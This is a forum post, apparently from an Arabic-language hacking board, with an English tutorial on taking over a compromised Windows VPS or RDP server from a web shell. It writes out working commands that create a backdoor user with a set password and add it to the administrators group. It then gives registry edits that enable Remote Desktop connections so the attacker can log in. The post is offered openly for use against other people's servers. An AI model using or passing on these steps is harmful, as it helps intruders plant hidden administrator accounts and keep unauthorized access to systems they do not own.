Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: اختراق سيرفرات الويندز


Senior Member

Status: Offline
Posts: 318
Date:
اختراق سيرفرات الويندز
Permalink Closed


Hacking VPS/RDP From Shell



hello to all my ABH brothers today am gonna show u how to hack a RDP/VPS from shell...well i dont find any tutorial posted regarding to this so i posted....so i give credits to original founder of this tut name is Ninja


First execute command on shell >

Code:
net user l33t p4$sword /add
l33t=username p4$sword=password

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

After execution the shell will give you a result like this :
Code:
The command completed successfully.
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

The user has been added with success now we need to add it on administrators group.


Attention: If the VPS Has an your unknown Language use google translate ( AutoDetect ).

Now to add administrator access to your user >

Code:
net localgroup administrators l33t /add
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

After execution connect to the VPS

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

If the VPS Have an static ip but doesn’t connect on (mstsc) use these commands to allow remote users :

Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
Bingo Have fun ! 

credits to Ninja


__________________
Page 1 of 1  sorted by
 
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard